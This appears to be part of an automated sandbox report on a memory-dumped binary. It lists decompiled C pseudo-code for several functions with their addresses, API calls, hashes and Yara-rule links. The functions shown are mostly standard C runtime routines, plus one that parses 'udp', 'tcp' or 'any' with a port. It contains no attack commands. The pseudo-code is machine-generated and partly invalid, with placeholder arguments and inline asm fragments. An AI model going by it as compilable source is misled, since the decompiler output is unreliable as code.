                                                                                                                                                      • Opcode Fuzzy Hash: dda3d07b3f5b474a96c4fb7f5ec72ff845160fa6cf747c01c2d9405dde306d36
                                                                                                                                                      • Instruction Fuzzy Hash: 8B41DAB5A0420AAFCF00DFE8C8889EEB7FDBF8D714B24445AE501E7251D7769941CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009928F4, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E009928F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x99dcb8);
				E00993F70(__ebx, __edi, __esi);
				_t31 = E0099339D(__ebx, __edi, _t35);
				_t15 =  *0x99f534; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00993C3D(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x99f438; // 0x2c71678
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x99f010;
								if(__eflags != 0) {
									_push(_t33);
									E009954A0(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x99f438; // 0x2c71678
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x99f438; // 0x2c71678
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0099298F();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00992033(_t29, _t31, 0x20);
				}
				return E00993FB5(_t33);
			}











                                                                                                                                                      0x009928f4
                                                                                                                                                      0x009928f4
                                                                                                                                                      0x009928f4
                                                                                                                                                      0x009928f4
                                                                                                                                                      0x009928f6
                                                                                                                                                      0x009928fb
                                                                                                                                                      0x00992905
                                                                                                                                                      0x00992907
                                                                                                                                                      0x0099290f
                                                                                                                                                      0x00992930
                                                                                                                                                      0x00992936
                                                                                                                                                      0x0099293a
                                                                                                                                                      0x0099293d
                                                                                                                                                      0x00992940
                                                                                                                                                      0x00992946
                                                                                                                                                      0x00992948
                                                                                                                                                      0x0099294a
                                                                                                                                                      0x0099294d
                                                                                                                                                      0x00992953
                                                                                                                                                      0x00992955
                                                                                                                                                      0x00992957
                                                                                                                                                      0x0099295d
                                                                                                                                                      0x0099295f
                                                                                                                                                      0x00992960
                                                                                                                                                      0x00992965
                                                                                                                                                      0x0099295d
                                                                                                                                                      0x00992955
                                                                                                                                                      0x00992966
                                                                                                                                                      0x0099296b
                                                                                                                                                      0x0099296e
                                                                                                                                                      0x00992974
                                                                                                                                                      0x00992978
                                                                                                                                                      0x00992978
                                                                                                                                                      0x0099297e
                                                                                                                                                      0x00992985
                                                                                                                                                      0x00992917
                                                                                                                                                      0x00992917
                                                                                                                                                      0x00992917
                                                                                                                                                      0x0099291c
                                                                                                                                                      0x00992920
                                                                                                                                                      0x00992925
                                                                                                                                                      0x0099292d

                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 00992900
                                                                                                                                                        • Part of subcall function 0099339D: __getptd_noexit.LIBCMT ref: 009933A0
                                                                                                                                                        • Part of subcall function 0099339D: __amsg_exit.LIBCMT ref: 009933AD
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00992920
                                                                                                                                                      • __lock.LIBCMT ref: 00992930
                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0099294D
                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C71678), ref: 00992978
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                      • Opcode ID: 7abebab8415ba9f8737b91a4eed9f384dfafeebd2ccccc87f615753fc29a7f23
                                                                                                                                                      • Instruction ID: 8aa255679fe6933ff17e12cec66678ed5366b98b63ec99911e29eb2b30a2eafa
                                                                                                                                                      • Opcode Fuzzy Hash: 7abebab8415ba9f8737b91a4eed9f384dfafeebd2ccccc87f615753fc29a7f23
                                                                                                                                                      • Instruction Fuzzy Hash: 4C01D632D01711FBDF21AF5CAA4A75EB3A8BF44750F044015E444B7190C7786E41DBE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009954A0, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                      			E009954A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x99de48);
				_t8 = E00993F70(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00993FB5(_t8);
				}
				if( *0x9a0a98 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x9a093c, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E009938CA(_t32);
						 *_t10 = E00993888(GetLastError());
					}
					goto L9;
				}
				E00993C3D(__ebx, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00996520(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00996550();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E009954F6();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                                                                                                                      0x009954a0
                                                                                                                                                      0x009954a2
                                                                                                                                                      0x009954a7
                                                                                                                                                      0x009954ac
                                                                                                                                                      0x009954b1
                                                                                                                                                      0x00995528
                                                                                                                                                      0x0099552d
                                                                                                                                                      0x0099552d
                                                                                                                                                      0x009954ba
                                                                                                                                                      0x009954ff
                                                                                                                                                      0x00995500
                                                                                                                                                      0x00995508
                                                                                                                                                      0x0099550e
                                                                                                                                                      0x00995510
                                                                                                                                                      0x00995512
                                                                                                                                                      0x00995525
                                                                                                                                                      0x00995527
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00995510
                                                                                                                                                      0x009954be
                                                                                                                                                      0x009954c4
                                                                                                                                                      0x009954c9
                                                                                                                                                      0x009954cf
                                                                                                                                                      0x009954d4
                                                                                                                                                      0x009954d6
                                                                                                                                                      0x009954d7
                                                                                                                                                      0x009954d8
                                                                                                                                                      0x009954de
                                                                                                                                                      0x009954df
                                                                                                                                                      0x009954e6
                                                                                                                                                      0x009954ef
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009954f1
                                                                                                                                                      0x009954f1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009954f1

                                                                                                                                                      APIs
                                                                                                                                                      • __lock.LIBCMT ref: 009954BE
                                                                                                                                                        • Part of subcall function 00993C3D: __mtinitlocknum.LIBCMT ref: 00993C53
                                                                                                                                                        • Part of subcall function 00993C3D: __amsg_exit.LIBCMT ref: 00993C5F
                                                                                                                                                        • Part of subcall function 00993C3D: EnterCriticalSection.KERNEL32(?,?,?,0099754D,00000004,0099DEC8,0000000C,00995589,00000000,?,00000000,00000000,00000000,?,0099334F,00000001), ref: 00993C67
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 009954C9
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 009954D8
                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,0099DE48,0000000C,00993C1E,00000000,0099DD68,0000000C,00993C58,00000000,?,?,0099754D,00000004,0099DEC8,0000000C), ref: 00995508
                                                                                                                                                      • GetLastError.KERNEL32(?,0099754D,00000004,0099DEC8,0000000C,00995589,00000000,?,00000000,00000000,00000000,?,0099334F,00000001,00000214), ref: 00995519
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                                      • Opcode ID: e5ef359be7e3bb65aa34d71565c538842a999aeb7175958fe3fa71894ba57c1a
                                                                                                                                                      • Instruction ID: f34d610052be9fbe56e4733970b77a0fe6e00926d5f7b1826317c4352922f1f0
                                                                                                                                                      • Opcode Fuzzy Hash: e5ef359be7e3bb65aa34d71565c538842a999aeb7175958fe3fa71894ba57c1a
                                                                                                                                                      • Instruction Fuzzy Hash: 1301D671D05701ABEF216FBC9C0A75F3BA89F81361F228109F404A6091DB388A40DB96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00991071, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00991071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				void* _t25;

				_t25 = __edi;
				if(E00991C70(__edi, "udp") == 0) {
					if(E00991C70(__edi, "tcp") == 0) {
						if(E00991C70(__edi, "any") == 0) {
							goto L9;
						} else {
							 *__esi = 0x100;
							goto L6;
						}
					} else {
						 *__esi = 6;
						goto L6;
					}
				} else {
					 *__esi = 0x11;
					L6:
					if(E00991C70(_t25, ":") == 0) {
						L9:
						return 0;
					} else {
						_v8 = _v8 & 0x00000000;
						_t11 = E00991FD7(_t9 + 1,  &_v8, 0xa);
						if(_t11 == 0) {
							goto L9;
						} else {
							 *_a4 = _t11;
							return 1;
						}
					}
				}
			}






                                                                                                                                                      0x00991071
                                                                                                                                                      0x00991084
                                                                                                                                                      0x0099109d
                                                                                                                                                      0x009910b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009910b8
                                                                                                                                                      0x009910b8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009910b8
                                                                                                                                                      0x0099109f
                                                                                                                                                      0x0099109f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0099109f
                                                                                                                                                      0x00991086
                                                                                                                                                      0x00991086
                                                                                                                                                      0x009910be
                                                                                                                                                      0x009910cd
                                                                                                                                                      0x009910f1
                                                                                                                                                      0x009910f4
                                                                                                                                                      0x009910cf
                                                                                                                                                      0x009910cf
                                                                                                                                                      0x009910db
                                                                                                                                                      0x009910e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009910e7
                                                                                                                                                      0x009910ea
                                                                                                                                                      0x009910f0
                                                                                                                                                      0x009910f0
                                                                                                                                                      0x009910e5
                                                                                                                                                      0x009910cd

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcstoui64
                                                                                                                                                      • String ID: any$tcp$udp
                                                                                                                                                      • API String ID: 3882282163-1470427579
                                                                                                                                                      • Opcode ID: 9b03a2357e7e9937a54369cfe4488a7f4bc908751a7e0d0fb752363e62e95f97
                                                                                                                                                      • Instruction ID: 08f5e881b10edd15e95fc7246c5bdd35b35c418c34d5133154cfeb1081bd1fe0
                                                                                                                                                      • Opcode Fuzzy Hash: 9b03a2357e7e9937a54369cfe4488a7f4bc908751a7e0d0fb752363e62e95f97
                                                                                                                                                      • Instruction Fuzzy Hash: CC0162726493476AEF14AA2CDD43B3626DCAB82768F24011DB881D51C1FFF7D8D09629
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00999110, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                      			E00999110() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x99d320;
					_v28 =  *0x99d318;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                      0x00999115
                                                                                                                                                      0x0099911d
                                                                                                                                                      0x00999134
                                                                                                                                                      0x009990e0
                                                                                                                                                      0x009990e9
                                                                                                                                                      0x009990f5
                                                                                                                                                      0x009990f8
                                                                                                                                                      0x009990fb
                                                                                                                                                      0x009990fd
                                                                                                                                                      0x00999100
                                                                                                                                                      0x00999105
                                                                                                                                                      0x0099910f
                                                                                                                                                      0x00999107
                                                                                                                                                      0x0099910b
                                                                                                                                                      0x0099910b
                                                                                                                                                      0x0099911f
                                                                                                                                                      0x00999125
                                                                                                                                                      0x0099912d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0099912f
                                                                                                                                                      0x0099912f
                                                                                                                                                      0x00999133
                                                                                                                                                      0x00999133
                                                                                                                                                      0x0099912d

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,009984A4), ref: 00999115
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00999125
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                      • Opcode ID: 538c7d919474c653f4d74bef0b58dcd1a56dd9f1ec59def20ffeb969bd4c9575
                                                                                                                                                      • Instruction ID: 30e8250c99387d3e8a0ee217a739502a82f25a5f01f4ee0a17fba331a0aa2180
                                                                                                                                                      • Opcode Fuzzy Hash: 538c7d919474c653f4d74bef0b58dcd1a56dd9f1ec59def20ffeb969bd4c9575
                                                                                                                                                      • Instruction Fuzzy Hash: EEF0B430A05A0AE2DF101BADAC4F26FBB78FBC574AF820594D191B00C4DF3080B4D356
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00998FFC, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00998FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E009988ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E009989DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00998F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00998E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                      0x00999001
                                                                                                                                                      0x00999007
                                                                                                                                                      0x0099907a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0099900e
                                                                                                                                                      0x0099900e
                                                                                                                                                      0x00999011
                                                                                                                                                      0x0099902c
                                                                                                                                                      0x0099902f
                                                                                                                                                      0x0099904f
                                                                                                                                                      0x00999061
                                                                                                                                                      0x00999031
                                                                                                                                                      0x00999031
                                                                                                                                                      0x00999034
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00999036
                                                                                                                                                      0x00999048
                                                                                                                                                      0x00999048
                                                                                                                                                      0x00999034
                                                                                                                                                      0x0099907f
                                                                                                                                                      0x00999083
                                                                                                                                                      0x00999013
                                                                                                                                                      0x0099902b
                                                                                                                                                      0x0099902b
                                                                                                                                                      0x00999011

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                      • Instruction ID: c5d8629bf407b3f59b1ff6889a5050185a75a5ad38896dfe8350426438e6b053
                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                      • Instruction Fuzzy Hash: A2114B3200014ABBCF226E98CC02DEE3F6BBB59354B588519FA2859031D736C9B1AB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00993060, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E00993060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x99dcf8);
				E00993F70(__ebx, __edi, __esi);
				_t28 = E0099339D(__ebx, __edi, _t30);
				_t13 =  *0x99f534; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00993C3D(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x99f618; // 0x99f540
					 *((intOrPtr*)(_t29 - 0x1c)) = E00993022(_t8, _t25, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E009930CA();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0099339D(_t22, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00992033(_t25, _t26, 0x20);
				}
				return E00993FB5(_t28);
			}








                                                                                                                                                      0x00993060
                                                                                                                                                      0x00993060
                                                                                                                                                      0x00993060
                                                                                                                                                      0x00993060
                                                                                                                                                      0x00993060
                                                                                                                                                      0x00993062
                                                                                                                                                      0x00993067
                                                                                                                                                      0x00993071
                                                                                                                                                      0x00993073
                                                                                                                                                      0x0099307b
                                                                                                                                                      0x0099309f
                                                                                                                                                      0x009930a1
                                                                                                                                                      0x009930a7
                                                                                                                                                      0x009930ab
                                                                                                                                                      0x009930ae
                                                                                                                                                      0x009930b9
                                                                                                                                                      0x009930bc
                                                                                                                                                      0x009930c3
                                                                                                                                                      0x0099307d
                                                                                                                                                      0x0099307d
                                                                                                                                                      0x00993081
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00993083
                                                                                                                                                      0x00993088
                                                                                                                                                      0x00993088
                                                                                                                                                      0x00993081
                                                                                                                                                      0x0099308d
                                                                                                                                                      0x00993091
                                                                                                                                                      0x00993096
                                                                                                                                                      0x0099309e

                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 0099306C
                                                                                                                                                        • Part of subcall function 0099339D: __getptd_noexit.LIBCMT ref: 009933A0
                                                                                                                                                        • Part of subcall function 0099339D: __amsg_exit.LIBCMT ref: 009933AD
                                                                                                                                                      • __getptd.LIBCMT ref: 00993083
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00993091
                                                                                                                                                      • __lock.LIBCMT ref: 009930A1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3521780317-0
                                                                                                                                                      • Opcode ID: 9c5321386e8d50d32adb3a0b0d4afb131b027cffd60ec235fcb6d5d28e4c45fb
                                                                                                                                                      • Instruction ID: df5e020ac21d3b755627e631d82dfed6f80d05f5c6d0a6cef0980f4d21fd62b2
                                                                                                                                                      • Opcode Fuzzy Hash: 9c5321386e8d50d32adb3a0b0d4afb131b027cffd60ec235fcb6d5d28e4c45fb
                                                                                                                                                      • Instruction Fuzzy Hash: 92F03032941704DADF20BF7C950B75DB3A4AF80712F10C519E4A4A72D2CB745B41DB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%